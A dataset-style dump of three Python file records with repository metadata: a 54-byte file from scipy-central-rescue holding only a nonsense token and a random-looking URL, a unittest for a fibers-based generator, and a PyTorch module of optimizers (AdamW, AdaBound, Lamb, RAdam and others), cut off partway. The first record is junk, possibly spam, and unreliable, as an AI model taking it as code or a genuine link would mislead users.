] | permissive | isabella232/scipy-central-rescue | 43270c0e1850b989fbe9a5b1a06c3be11d16464a | 2b331610d52c189ae96bea4f4ce2ec343146b608 | refs/heads/master | 2021-09-06T09:17:30.627497 | 2018-02-04T19:41:11 | 2018-02-04T19:41:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 54 | py | gotOZN http://www.LnAJ7K8QSpkiStk3sLL0hQP6MO2wQ8gO.com | [
"[email protected]"
] | |
fed38d32e3c3d4c4c31ce116303ad6588a73d350 | 49cd488edb28d0433aaab9686e90ed90d134dd14 | /tests/test_generator.py | c422ffbb35a6f1b2df7ba62d732e99b0d49a368f | [
"MIT"
] | permissive | Dmdv/python-fibers | 349fab65a37475b2fee73bdc53960b1a289227bd | 20349077843033610864935e45977cf33d16a7e1 | refs/heads/master | 2021-01-15T20:53:34.925672 | 2013-08-06T21:19:08 | 2013-08-06T21:19:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,434 | py |
import sys
sys.path.insert(0, '../')
import unittest
import fibers
from fibers import Fiber
class genlet(Fiber):
def __init__(self, *args, **kwds):
self.args = args
self.kwds = kwds
Fiber.__init__(self, target=self.run)
def run(self):
fn, = self.fn
fn(*self.args, **self.kwds)
def __iter__(self):
return self
def __next__(self):
self.parent = fibers.current()
result = self.switch()
if self.is_alive():
return result
else:
raise StopIteration
# Hack: Python < 2.6 compatibility
next = __next__
def Yield(value):
g = fibers.current()
while not isinstance(g, genlet):
if g is None:
raise RuntimeError('yield outside a genlet')
g = g.parent
g.parent.switch(value)
def generator(func):
class generator(genlet):
fn = (func,)
return generator
# ____________________________________________________________
class GeneratorTests(unittest.TestCase):
def test_generator(self):
seen = []
def g(n):
for i in range(n):
seen.append(i)
Yield(i)
g = generator(g)
for k in range(3):
for j in g(5):
seen.append(j)
self.assertEqual(seen, 3 * [0, 0, 1, 1, 2, 2, 3, 3, 4, 4])
if __name__ == '__main__':
unittest.main(verbosity=2)
| [
"[email protected]"
] | |
fac8ec60cc6c93ba0484b469e3c1814f07f23104 | 3b28143a893fcd6d2d0ed843db74eaf5f63fe542 | /pydatagrand/callback/optimizater.py | 603284a6359f1eea4369c77f94000b37cf2c16a2 | [] | no_license | gaozhanfire/daguan_2019_rank9 | 1e2f506c11067cf66ff0fe3a2460773f71955ef6 | 2b77a50455d33a8d484180fa548025b5ef72dfb6 | refs/heads/master | 2020-08-06T17:42:54.445208 | 2019-09-30T12:01:41 | 2019-09-30T12:01:41 | 213,096,559 | 1 | 0 | null | 2019-10-06T02:03:12 | 2019-10-06T02:03:11 | null | UTF-8 | Python | false | false | 66,068 | py | import math
import torch
import operator
from copy import copy
import functools
from math import sqrt
from torch.optim.optimizer import Optimizer
import itertools as it
from torch.nn.utils import clip_grad_norm_
from .utils import *
__call__ = ['SGDW',
'AdamW',
'AdaBound',
'Nadam',
'AdaFactor',
'WeightDecayOptimizerWrapper',
'NovoGrad',
'Lamb',
'Lars',
'RAdam',
'Ralamb',
'Lookahead',
'RaLars',
'Ranger',
'BertAdam'
]
class SGDW(Optimizer):
r"""Implements stochastic gradient descent (optionally with momentum) with
weight decay from the paper `Fixing Weight Decay Regularization in Adam`_.
Nesterov momentum is based on the formula from
`On the importance of initialization and momentum in deep learning`__.
Args:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float): learning rate
momentum (float, optional): momentum factor (default: 0)
weight_decay (float, optional): weight decay factor (default: 0)
dampening (float, optional): dampening for momentum (default: 0)
nesterov (bool, optional): enables Nesterov momentum (default: False)
.. _Fixing Weight Decay Regularization in Adam:
https://arxiv.org/abs/1711.05101
Example:
>>> model = LSTM()
>>> optimizer = SGDW(model.parameters(), lr=0.1, momentum=0.9,weight_decay=1e-5)
"""
def __init__(self, params, lr=0.1, momentum=0, dampening=0,
weight_decay=0, nesterov=False):
if lr < 0.0:
raise ValueError(f"Invalid learning rate: {lr}")
if momentum < 0.0:
raise ValueError(f"Invalid momentum value: {momentum}")
if weight_decay < 0.0:
raise ValueError(f"Invalid weight_decay value: {weight_decay}")
defaults = dict(lr=lr, momentum=momentum, dampening=dampening,
weight_decay=weight_decay, nesterov=nesterov)
if nesterov and (momentum <= 0 or dampening != 0):
raise ValueError("Nesterov momentum requires a momentum and zero dampening")
super(SGDW, self).__init__(params, defaults)
def __setstate__(self, state):
super(SGDW, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('nesterov', False)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group['weight_decay']
momentum = group['momentum']
dampening = group['dampening']
nesterov = group['nesterov']
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
if momentum != 0:
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.zeros_like(p.data)
buf.mul_(momentum).add_(d_p)
else:
buf = param_state['momentum_buffer']
buf.mul_(momentum).add_(1 - dampening, d_p)
if nesterov:
d_p = d_p.add(momentum, buf)
else:
d_p = buf
if weight_decay != 0:
p.data.add_(-weight_decay, p.data)
p.data.add_(-group['lr'], d_p)
return loss
class AdamW(Optimizer):
"""Implements Adam algorithm.
Arguments:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float, optional): learning rate (default: 1e-3)
betas (Tuple[float, float], optional): coefficients used for computing
running averages of gradient and its square (default: (0.9, 0.999))
eps (float, optional): term added to the denominator to improve
numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
amsgrad (boolean, optional): whether to use the AMSGrad variant of this
algorithm from the paper `On the Convergence of Adam and Beyond`_
Example:
>>> model = LSTM()
>>> optimizer = AdamW(model.parameters(), lr=1e-3, weight_decay=1e-5)
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8,
weight_decay=0, amsgrad=False):
if lr < 0.0:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
defaults = dict(lr=lr, betas=betas, eps=eps,weight_decay=weight_decay, amsgrad=amsgrad)
#super(AdamW, self).__init__(params, defaults)
super().__init__(params, defaults)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError('Adam does not support sparse gradients, please consider SparseAdam instead')
amsgrad = group['amsgrad']
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = torch.zeros_like(p.data)
if amsgrad:
# Maintains max of all exp. moving avg. of sq. grad. values
state['max_exp_avg_sq'] = torch.zeros_like(p.data)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
if amsgrad:
max_exp_avg_sq = state['max_exp_avg_sq']
beta1, beta2 = group['betas']
state['step'] += 1
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(1 - beta1, grad)
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
if amsgrad:
# Maintains the maximum of all 2nd moment running avg. till now
torch.max(max_exp_avg_sq, exp_avg_sq, out=max_exp_avg_sq)
# Use the max. for normalizing running avg. of gradient
denom = max_exp_avg_sq.sqrt().add_(group['eps'])
else:
denom = exp_avg_sq.sqrt().add_(group['eps'])
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
step_size = group['lr'] * math.sqrt(bias_correction2) / bias_correction1
if group['weight_decay'] != 0:
decayed_weights = torch.mul(p.data, group['weight_decay'])
p.data.addcdiv_(-step_size, exp_avg, denom)
p.data.sub_(decayed_weights)
else:
p.data.addcdiv_(-step_size, exp_avg, denom)
return loss
class AdaBound(Optimizer):
"""Implements AdaBound algorithm.
It has been proposed in `Adaptive Gradient Methods with Dynamic Bound of Learning Rate`_.
Arguments:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float, optional): Adam learning rate (default: 1e-3)
betas (Tuple[float, float], optional): coefficients used for computing
running averages of gradient and its square (default: (0.9, 0.999))
final_lr (float, optional): final (SGD) learning rate (default: 0.1)
gamma (float, optional): convergence speed of the bound functions (default: 1e-3)
eps (float, optional): term added to the denominator to improve
numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
amsbound (boolean, optional): whether to use the AMSBound variant of this algorithm
.. Adaptive Gradient Methods with Dynamic Bound of Learning Rate:
https://openreview.net/forum?id=Bkg3g2R9FX
Example:
>>> model = LSTM()
>>> optimizer = AdaBound(model.parameters())
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), final_lr=0.1, gamma=1e-3,
eps=1e-8, weight_decay=0, amsbound=False):
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
if not 0.0 <= final_lr:
raise ValueError("Invalid final learning rate: {}".format(final_lr))
if not 0.0 <= gamma < 1.0:
raise ValueError("Invalid gamma parameter: {}".format(gamma))
defaults = dict(lr=lr, betas=betas, final_lr=final_lr, gamma=gamma, eps=eps,
weight_decay=weight_decay, amsbound=amsbound)
super(AdaBound, self).__init__(params, defaults)
self.base_lrs = list(map(lambda group: group['lr'], self.param_groups))
def __setstate__(self, state):
super(AdaBound, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('amsbound', False)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group, base_lr in zip(self.param_groups, self.base_lrs):
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError(
'Adam does not support sparse gradients, please consider SparseAdam instead')
amsbound = group['amsbound']
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = torch.zeros_like(p.data)
if amsbound:
# Maintains max of all exp. moving avg. of sq. grad. values
state['max_exp_avg_sq'] = torch.zeros_like(p.data)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
if amsbound:
max_exp_avg_sq = state['max_exp_avg_sq']
beta1, beta2 = group['betas']
state['step'] += 1
if group['weight_decay'] != 0:
grad = grad.add(group['weight_decay'], p.data)
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(1 - beta1, grad)
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
if amsbound:
# Maintains the maximum of all 2nd moment running avg. till now
torch.max(max_exp_avg_sq, exp_avg_sq, out=max_exp_avg_sq)
# Use the max. for normalizing running avg. of gradient
denom = max_exp_avg_sq.sqrt().add_(group['eps'])
else:
denom = exp_avg_sq.sqrt().add_(group['eps'])
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
step_size = group['lr'] * math.sqrt(bias_correction2) / bias_correction1
# Applies bounds on actual learning rate
# lr_scheduler cannot affect final_lr, this is a workaround to apply lr decay
final_lr = group['final_lr'] * group['lr'] / base_lr
lower_bound = final_lr * (1 - 1 / (group['gamma'] * state['step'] + 1))
upper_bound = final_lr * (1 + 1 / (group['gamma'] * state['step']))
step_size = torch.full_like(denom, step_size)
step_size.div_(denom).clamp_(lower_bound, upper_bound).mul_(exp_avg)
p.data.add_(-step_size)
return loss
class Nadam(Optimizer):
"""Implements Nadam algorithm (a variant of Adam based on Nesterov momentum).
It has been proposed in `Incorporating Nesterov Momentum into Adam`__.
Arguments:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float, optional): learning rate (default: 2e-3)
betas (Tuple[float, float], optional): coefficients used for computing
running averages of gradient and its square
eps (float, optional): term added to the denominator to improve
numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
schedule_decay (float, optional): momentum schedule decay (default: 4e-3)
__ http://cs229.stanford.edu/proj2015/054_report.pdf
__ http://www.cs.toronto.edu/~fritz/absps/momentum.pdf
Originally taken from: https://github.com/pytorch/pytorch/pull/1408
NOTE: Has potential issues but does work well on some problems.
Example:
>>> model = LSTM()
>>> optimizer = Nadam(model.parameters())
"""
def __init__(self, params, lr=2e-3, betas=(0.9, 0.999), eps=1e-8,
weight_decay=0, schedule_decay=4e-3):
defaults = dict(lr=lr, betas=betas, eps=eps,
weight_decay=weight_decay, schedule_decay=schedule_decay)
super(Nadam, self).__init__(params, defaults)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
state['m_schedule'] = 1.
state['exp_avg'] = grad.new().resize_as_(grad).zero_()
state['exp_avg_sq'] = grad.new().resize_as_(grad).zero_()
# Warming momentum schedule
m_schedule = state['m_schedule']
schedule_decay = group['schedule_decay']
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
beta1, beta2 = group['betas']
eps = group['eps']
state['step'] += 1
t = state['step']
if group['weight_decay'] != 0:
grad = grad.add(group['weight_decay'], p.data)
momentum_cache_t = beta1 * \
(1. - 0.5 * (0.96 ** (t * schedule_decay)))
momentum_cache_t_1 = beta1 * \
(1. - 0.5 * (0.96 ** ((t + 1) * schedule_decay)))
m_schedule_new = m_schedule * momentum_cache_t
m_schedule_next = m_schedule * momentum_cache_t * momentum_cache_t_1
state['m_schedule'] = m_schedule_new
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(1. - beta1, grad)
exp_avg_sq.mul_(beta2).addcmul_(1. - beta2, grad, grad)
exp_avg_sq_prime = exp_avg_sq / (1. - beta2 ** t)
denom = exp_avg_sq_prime.sqrt_().add_(eps)
p.data.addcdiv_(-group['lr'] * (1. - momentum_cache_t) / (1. - m_schedule_new), grad, denom)
p.data.addcdiv_(-group['lr'] * momentum_cache_t_1 / (1. - m_schedule_next), exp_avg, denom)
return loss
class AdaFactor(Optimizer):
'''
# Code below is an implementation of https://arxiv.org/pdf/1804.04235.pdf
# inspired but modified from https://github.com/DeadAt0m/adafactor-pytorch
Example:
>>> model = LSTM()
>>> optimizer = AdaFactor(model.parameters(),lr= lr)
'''
def __init__(self, params, lr=None, beta1=0.9, beta2=0.999, eps1=1e-30,
eps2=1e-3, cliping_threshold=1, non_constant_decay=True,
enable_factorization=True, ams_grad=True, weight_decay=0):
enable_momentum = beta1 != 0
if non_constant_decay:
ams_grad = False
defaults = dict(lr=lr, beta1=beta1, beta2=beta2, eps1=eps1,
eps2=eps2, cliping_threshold=cliping_threshold,
weight_decay=weight_decay, ams_grad=ams_grad,
enable_factorization=enable_factorization,
enable_momentum=enable_momentum,
non_constant_decay=non_constant_decay)
super(AdaFactor, self).__init__(params, defaults)
def __setstate__(self, state):
super(AdaFactor, self).__setstate__(state)
def _experimental_reshape(self, shape):
temp_shape = shape[2:]
if len(temp_shape) == 1:
new_shape = (shape[0], shape[1]*shape[2])
else:
tmp_div = len(temp_shape) // 2 + len(temp_shape) % 2
new_shape = (shape[0]*functools.reduce(operator.mul,
temp_shape[tmp_div:], 1),
shape[1]*functools.reduce(operator.mul,
temp_shape[:tmp_div], 1))
return new_shape, copy(shape)
def _check_shape(self, shape):
'''
output1 - True - algorithm for matrix, False - vector;
output2 - need reshape
'''
if len(shape) > 2:
return True, True
elif len(shape) == 2:
return True, False
elif len(shape) == 2 and (shape[0] == 1 or shape[1] == 1):
return False, False
else:
return False, False
def _rms(self, x):
return sqrt(torch.mean(x.pow(2)))
def step(self, closure=None):
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError('Adam does not support sparse \
gradients, use SparseAdam instead')
is_matrix, is_need_reshape = self._check_shape(grad.size())
new_shape = p.data.size()
if is_need_reshape and group['enable_factorization']:
new_shape, old_shape = \
self._experimental_reshape(p.data.size())
grad = grad.view(new_shape)
state = self.state[p]
if len(state) == 0:
state['step'] = 0
if group['enable_momentum']:
state['exp_avg'] = torch.zeros(new_shape,
dtype=torch.float32,
device=p.grad.device)
if is_matrix and group['enable_factorization']:
state['exp_avg_sq_R'] = \
torch.zeros((1, new_shape[1]),
dtype=torch.float32,
device=p.grad.device)
state['exp_avg_sq_C'] = \
torch.zeros((new_shape[0], 1),
dtype=torch.float32,
device=p.grad.device)
else:
state['exp_avg_sq'] = torch.zeros(new_shape,
dtype=torch.float32,
device=p.grad.device)
if group['ams_grad']:
state['exp_avg_sq_hat'] = \
torch.zeros(new_shape, dtype=torch.float32,
device=p.grad.device)
if group['enable_momentum']:
exp_avg = state['exp_avg']
if is_matrix and group['enable_factorization']:
exp_avg_sq_r = state['exp_avg_sq_R']
exp_avg_sq_c = state['exp_avg_sq_C']
else:
exp_avg_sq = state['exp_avg_sq']
if group['ams_grad']:
exp_avg_sq_hat = state['exp_avg_sq_hat']
state['step'] += 1
lr_t = group['lr']
lr_t *= max(group['eps2'], self._rms(p.data))
if group['enable_momentum']:
if group['non_constant_decay']:
beta1_t = group['beta1'] * \
(1 - group['beta1'] ** (state['step'] - 1)) \
/ (1 - group['beta1'] ** state['step'])
else:
beta1_t = group['beta1']
exp_avg.mul_(beta1_t).add_(1 - beta1_t, grad)
if group['non_constant_decay']:
beta2_t = group['beta2'] * \
(1 - group['beta2'] ** (state['step'] - 1)) / \
(1 - group['beta2'] ** state['step'])
else:
beta2_t = group['beta2']
if is_matrix and group['enable_factorization']:
exp_avg_sq_r.mul_(beta2_t). \
add_(1 - beta2_t, torch.sum(torch.mul(grad, grad).
add_(group['eps1']),
dim=0, keepdim=True))
exp_avg_sq_c.mul_(beta2_t). \
add_(1 - beta2_t, torch.sum(torch.mul(grad, grad).
add_(group['eps1']),
dim=1, keepdim=True))
v = torch.mul(exp_avg_sq_c,
exp_avg_sq_r).div_(torch.sum(exp_avg_sq_r))
else:
exp_avg_sq.mul_(beta2_t). \
addcmul_(1 - beta2_t, grad, grad). \
add_((1 - beta2_t)*group['eps1'])
v = exp_avg_sq
g = grad
if group['enable_momentum']:
g = torch.div(exp_avg, 1 - beta1_t ** state['step'])
if group['ams_grad']:
torch.max(exp_avg_sq_hat, v, out=exp_avg_sq_hat)
v = exp_avg_sq_hat
u = torch.div(g, (torch.div(v, 1 - beta2_t **
state['step'])).sqrt().add_(group['eps1']))
else:
u = torch.div(g, v.sqrt())
u.div_(max(1, self._rms(u) / group['cliping_threshold']))
p.data.add_(-lr_t * (u.view(old_shape) if is_need_reshape and
group['enable_factorization'] else u))
if group['weight_decay'] != 0:
p.data.add_(-group['weight_decay'] * lr_t, p.data)
return loss
class WeightDecayOptimizerWrapper(Optimizer):
'''
Example:
>>> from torch.optim import Adam
>>> model = LSTM()
>>> optimizer = WeightDecayOptimizerWrapper(Adam(model.parameters(),lr = 1e-3),weight_decay=0.05)
'''
def __init__(self, optimizer, weight_decay, change_with_lr = True):
self.optimizer = optimizer
if isinstance(weight_decay, (list, tuple)):
assert len(weight_decay) == len(self.optimizer.param_groups)
assert all((x >= 0 for x in weight_decay))
self.weight_decays = weight_decay
else:
assert weight_decay >= 0
self.weight_decays = [weight_decay] * \
len(self.optimizer.param_groups)
self.state = self.optimizer.state
self.change_with_lr = change_with_lr
def step(self, closure=None) -> None:
for group, weight_decay in zip(self.optimizer.param_groups, self.weight_decays):
for param in group['params']:
if param.grad is None or weight_decay == 0:
continue
if self.change_with_lr:
param.data = param.data.add(
-weight_decay * group['lr'], param.data)
else:
param.data.add_(-weight_decay, param.data)
self.optimizer.step()
def zero_grad(self) -> None:
self.optimizer.zero_grad()
def add_param_group(self, param_group):
self.optimizer.add_param_group(param_group)
def load_state_dict(self, state_dict):
self.optimizer.load_state_dict(state_dict)
def state_dict(self):
return self.optimizer.state_dict()
def __repr__(self):
return self.optimizer.__repr__()
def __getstate__(self):
return self.optimizer.__getstate__()
def __setstate__(self, state):
self.optimizer.__setstate__(state)
self.state = self.optimizer.state
@property
def param_groups(self):
return self.optimizer.param_groups
class NovoGrad(Optimizer):
"""Implements NovoGrad algorithm.
Arguments:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float, optional): learning rate (default: 1e-2)
betas (Tuple[float, float], optional): coefficients used for computing
running averages of gradient and its square (default: (0.95, 0.98))
eps (float, optional): term added to the denominator to improve
numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
Example:
>>> model = ResNet()
>>> optimizer = NovoGrad(model.parameters(), lr=1e-2, weight_decay=1e-5)
"""
def __init__(self, params, lr=0.01, betas=(0.95, 0.98), eps=1e-8,
weight_decay=0,grad_averaging=False):
if lr < 0.0:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
defaults = dict(lr=lr, betas=betas, eps=eps,weight_decay=weight_decay,grad_averaging = grad_averaging)
super().__init__(params, defaults)
def step(self, closure=None):
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError('NovoGrad does not support sparse gradients')
state = self.state[p]
g_2 = torch.sum(grad ** 2)
if len(state) == 0:
state['step'] = 0
state['moments'] = grad.div(g_2.sqrt() +group['eps']) + \
group['weight_decay'] * p.data
state['grads_ema'] = g_2
moments = state['moments']
grads_ema = state['grads_ema']
beta1, beta2 = group['betas']
state['step'] += 1
grads_ema.mul_(beta2).add_(1 - beta2, g_2)
denom = grads_ema.sqrt().add_(group['eps'])
grad.div_(denom)
# weight decay
if group['weight_decay'] != 0:
decayed_weights = torch.mul(p.data, group['weight_decay'])
grad.add_(decayed_weights)
# Momentum --> SAG
if group['grad_averaging']:
grad.mul_(1.0 - beta1)
moments.mul_(beta1).add_(grad) # velocity
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
step_size = group['lr'] * math.sqrt(bias_correction2) / bias_correction1
p.data.add_(-step_size, moments)
return loss
class Lamb(Optimizer):
"""Implements the Lamb optimizer from https://arxiv.org/pdf/1904.00962v3.pdf
Args:
params (iterable): iterable of parameters to optimize or dicts defining parameter groups
lr (float, optional): learning rate
betas (Tuple[float, float], optional): coefficients used for computing running averages of gradient and its square (default: (0.9, 0.999))
eps (float, optional): term added to the denominator to improve numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
scale_clip (tuple, optional): the lower and upper bounds for the weight norm in local LR of LARS
Example:
>>> model = ResNet()
>>> optimizer = Lamb(model.parameters(), lr=1e-2, weight_decay=1e-5)
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, weight_decay=0,
scale_clip=None):
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay)
super(Lamb, self).__init__(params, defaults)
# LARS arguments
self.scale_clip = scale_clip
if self.scale_clip is None:
self.scale_clip = (0, 10)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError('RAdam does not support sparse gradients')
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = torch.zeros_like(p.data)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
beta1, beta2 = group['betas']
state['step'] += 1
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(1 - beta1, grad)
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
# Gradient term correction
update = torch.zeros_like(p.data)
denom = exp_avg_sq.sqrt().add_(group['eps'])
update.addcdiv_(1, exp_avg, denom)
# Weight decay
if group['weight_decay'] != 0:
update.add_(group['weight_decay'], p.data)
# LARS
p_norm = p.data.pow(2).sum().sqrt()
update_norm = update.pow(2).sum().sqrt()
phi_p = p_norm.clamp(*self.scale_clip)
# Compute the local LR
if phi_p == 0 or update_norm == 0:
local_lr = 1
else:
local_lr = phi_p / update_norm
state['local_lr'] = local_lr
p.data.add_(-group['lr'] * local_lr, update)
return loss
class Lars(Optimizer):
r"""Implements the LARS optimizer from https://arxiv.org/pdf/1708.03888.pdf
Args:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float): learning rate
momentum (float, optional): momentum factor (default: 0)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
dampening (float, optional): dampening for momentum (default: 0)
nesterov (bool, optional): enables Nesterov momentum (default: False)
scale_clip (tuple, optional): the lower and upper bounds for the weight norm in local LR of LARS
Example:
>>> model = ResNet()
>>> optimizer = Lars(model.parameters(), lr=1e-2, weight_decay=1e-5)
"""
def __init__(self, params, lr, momentum=0, dampening=0,
weight_decay=0, nesterov=False, scale_clip=None):
if lr < 0.0:
raise ValueError("Invalid learning rate: {}".format(lr))
if momentum < 0.0:
raise ValueError("Invalid momentum value: {}".format(momentum))
if weight_decay < 0.0:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
defaults = dict(lr=lr, momentum=momentum, dampening=dampening,
weight_decay=weight_decay, nesterov=nesterov)
if nesterov and (momentum <= 0 or dampening != 0):
raise ValueError("Nesterov momentum requires a momentum and zero dampening")
super(Lars, self).__init__(params, defaults)
# LARS arguments
self.scale_clip = scale_clip
if self.scale_clip is None:
self.scale_clip = (0, 10)
def __setstate__(self, state):
super(Lars, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('nesterov', False)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group['weight_decay']
momentum = group['momentum']
dampening = group['dampening']
nesterov = group['nesterov']
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
if weight_decay != 0:
d_p.add_(weight_decay, p.data)
if momentum != 0:
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.clone(d_p).detach()
else:
buf = param_state['momentum_buffer']
buf.mul_(momentum).add_(1 - dampening, d_p)
if nesterov:
d_p = d_p.add(momentum, buf)
else:
d_p = buf
# LARS
p_norm = p.data.pow(2).sum().sqrt()
update_norm = d_p.pow(2).sum().sqrt()
# Compute the local LR
if p_norm == 0 or update_norm == 0:
local_lr = 1
else:
local_lr = p_norm / update_norm
p.data.add_(-group['lr'] * local_lr, d_p)
return loss
#
class RAdam(Optimizer):
"""Implements the RAdam optimizer from https://arxiv.org/pdf/1908.03265.pdf
Args:
params (iterable): iterable of parameters to optimize or dicts defining parameter groups
lr (float, optional): learning rate
betas (Tuple[float, float], optional): coefficients used for computing running averages of gradient and its square (default: (0.9, 0.999))
eps (float, optional): term added to the denominator to improve numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
Example:
>>> model = ResNet()
>>> optimizer = RAdam(model.parameters(), lr=0.001)
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, weight_decay=0):
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay)
super(RAdam, self).__init__(params, defaults)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
# Get group-shared variables
beta1, beta2 = group['betas']
sma_inf = group.get('sma_inf')
# Compute max length of SMA on first step
if not isinstance(sma_inf, float):
group['sma_inf'] = 2 / (1 - beta2) - 1
sma_inf = group.get('sma_inf')
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError('RAdam does not support sparse gradients')
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
